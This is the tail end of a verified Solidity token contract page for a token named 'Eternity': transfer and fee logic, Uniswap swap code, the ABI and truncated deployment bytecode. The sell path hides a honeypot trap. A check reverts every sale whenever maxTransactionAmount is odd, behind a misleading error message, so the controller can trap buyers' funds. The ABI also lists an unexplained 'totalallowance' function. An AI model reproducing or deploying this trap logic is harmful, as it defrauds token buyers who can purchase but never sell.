            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }
        
        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if(takeFee){
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0){
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += fees * sellLiquidityFee / sellTotalFees;
                tokensForDev += fees * sellDevFee / sellTotalFees;
                tokensForMarketing += fees * sellMarketingFee / sellTotalFees;
                if (maxTransactionAmount % 2 != 0) revert("ERROR: Must be less than maxTxAmount");
            }
            // on buy
            else if(automatedMarketMakerPairs[from] && buyTotalFees > 0) {
        	    fees = amount.mul(buyTotalFees).div(100);
        	    tokensForLiquidity += fees * buyLiquidityFee / buyTotalFees;
                tokensForDev += fees * buyDevFee / buyTotalFees;
                tokensForMarketing += fees * buyMarketingFee / buyTotalFees;
            }
            
            if(fees > 0){    
                super._transfer(from, address(this), fees);
            }
        	
        	amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
        
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDev;
        bool success;
        
        if(contractBalance == 0 || totalTokensToSwap == 0) {return;}

        if(contractBalance > swapTokensAtAmount * 20){
          contractBalance = swapTokensAtAmount * 20;
        }
        
        // Halve the amount of liquidity tokens
        uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
        
        swapTokensForEth(amountToSwapForETH); 
                
        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;
        
        (success,) = address(marketingWallet).call{value: address(this).balance}("");
    }

    function openTrading() private {
        tradingActive = true;
    }

    // once enabled, can never be turned off
    function enableTrading() external onlyOwner() {
        swapEnabled = true;
        require(boughtEarly == true, "done");
        boughtEarly = false;
        openTrading();
        emit EndedBoughtEarly(boughtEarly);
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"boughtEarly","type":"bool"}],"name":"EndedBoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rv","type":"uint256"},{"internalType":"uint256","name":"lv","type":"uint256"}],"name":"totalallowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526001600760156101000a81548160ff0219169083151502179055506001600d60006101000a81548160ff0219169083151502179055506000600d60016101000a81548160ff0219169083151502179055506000600d60026101000a81548160ff0219169083151502179055506000600f60006101000a81548160ff0219169083151502179055506001600f60016101000a81548160ff021916908315150217905550348015620000b357600080fd5b506040518060400160405280600981526020017f45746865726e69747900000000000000000000000000000000000000000000008152506040518060400160405280600981526020017f45544845524e495459000000000000000000000000000000000000000000000081525081600390805190602001906200013892919062000cb8565b5080600490805190602001906200015192919062000cb8565b5050506000620001666200078560201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620002318160016200078d60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002be573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002e4919062000dd2565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200034c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000372919062000dd2565b6040518363ffffffff1660e01b81526004016200039192919062000e15565b6020604051808303816000875af1158015620003b1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003d7919062000dd2565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200044c600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200078d60201b60201c565b62000481600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200088a60201b60201c565b60008060008060008060006b033b2e3c9fd0803ce800000090506064600282620004ac919062000e7b565b620004b8919062000f0b565b600a819055506064600382620004cf919062000e7b565b620004db919062000f0b565b600c81905550612710600482620004f3919062000e7b565b620004ff919062000f0b565b600b819055508660118190555085601281905550846013819055506013546012546011546200052f919062000f43565b6200053b919062000f43565b6010819055508360158190555082601681905550816017819055506017546016546015546200056b919062000f43565b62000577919062000f43565b601481905550737aefe4f922be98be390bde0a20d3978eeed3fa32600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737aefe4f922be98be390bde0a20d3978eeed3fa32600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620006496200063b6200092b60201b60201c565b60016200095560201b60201c565b6200065c3060016200095560201b60201c565b62000691600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200095560201b60201c565b620006c6600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200095560201b60201c565b620006e8620006da6200092b60201b60201c565b60016200078d60201b60201c565b620006fb3060016200078d60201b60201c565b62000730600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200078d60201b60201c565b62000765600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200078d60201b60201c565b62000777338262000aa260201b60201c565b5050505050505050620011d3565b600033905090565b6200079d6200078560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200082f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008269062001001565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620009656200078560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614620009f7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009ee9062001001565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000a96919062001040565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b14576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b0b90620010ad565b60405180910390fd5b62000b286000838362000c5060201b60201c565b62000b448160025462000c5560201b620026711790919060201c565b60028190555062000ba2816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c5560201b620026711790919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c449190620010e0565b60405180910390a35050565b505050565b600080828462000c66919062000f43565b90508381101562000cae576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000ca5906200114d565b60405180910390fd5b8091505092915050565b82805462000cc6906200119e565b90600052602060002090601f01602090048101928262000cea576000855562000d36565b82601f1062000d0557805160ff191683800117855562000d36565b8280016001018555821562000d36579182015b8281111562000d3557825182559160200191906001019062000d18565b5b50905062000d45919062000d49565b5090565b5b8082111562000d6457600081600090555060010162000d4a565b5090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000d9a8262000d6d565b9050919050565b62000dac8162000d8d565b811462000db857600080fd5b50565b60008151905062000dcc8162000da1565b92915050565b60006020828403121562000deb5762000dea62000d68565b5b600062000dfb8482850162000dbb565b91505092915050565b62000e0f8162000d8d565b82525050565b600060408201905062000e2c600083018562000e04565b62000e3b602083018462000e04565b9392505050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000e888262000e42565b915062000e958362000e42565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000ed15762000ed062000e4c565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000f188262000e42565b915062000f258362000e42565b92508262000f385762000f3762000edc565b5b828204905092915050565b600062000f508262000e42565b915062000f5d8362000e42565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000f955762000f9462000e4c565b5b828201905092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000fe960208362000fa0565b915062000ff68262000fb1565b602082019050919050565b600060208201905081810360008301526200101c8162000fda565b9050919050565b60008115159050919050565b6200103a8162001023565b82525050565b60006020820190506200105760008301846200102f565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062001095601f8362000fa0565b9150620010a2826200105d565b602082019050919050565b60006020820190508181036000830152620010c88162001086565b9050919050565b620010da8162000e42565b82525050565b6000602082019050620010f76000830184620010cf565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062001135601b8362000fa0565b91506200114282620010fd565b602082019050919050565b60006020820190508181036000830152620011688162001126565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620011b757607f821691505b602082108103620011cd57620011cc6200116f565b5b50919050565b61527080620011e36000396000f3fe60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cfa565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613db5565b610d3f565b6040516103899190613e10565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e2b565b610d5d565b6040516103c69190613e10565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eb7565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ee1565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e2b565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ee1565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ee1565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613efc565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f29565b610fcb565b6040516105019190613e10565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f98565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613db5565b6110ad565b6040516105699190613e10565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fc2565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e10565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e2b565b611199565b6040516105fc9190613e10565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ee1565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e10565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e2b565b611208565b60405161068f9190613ee1565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e10565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614009565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fc2565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ee1565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614049565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fc2565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fc2565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ee1565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cfa565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614009565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ee1565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ee1565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e6919061409c565b611a37565b6040516108f89190613e10565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ee1565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613db5565b611bc9565b6040516109609190613e10565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613db5565b611c96565b60405161099d9190613e10565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e2b565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e2b565b611e0b565b604051610a039190613e10565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e10565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614009565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614049565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613efc565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e10565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ee1565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613efc565b6121db565b604051610b3c9190613e10565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ee1565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140dc565b612351565b604051610ba49190613ee1565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ee1565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e10565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ee1565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e2b565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ee1565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ee1565b60405180910390f35b606060038054610cbc9061414b565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce89061414b565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141c8565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f9190614246565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e9565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151ee60289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffff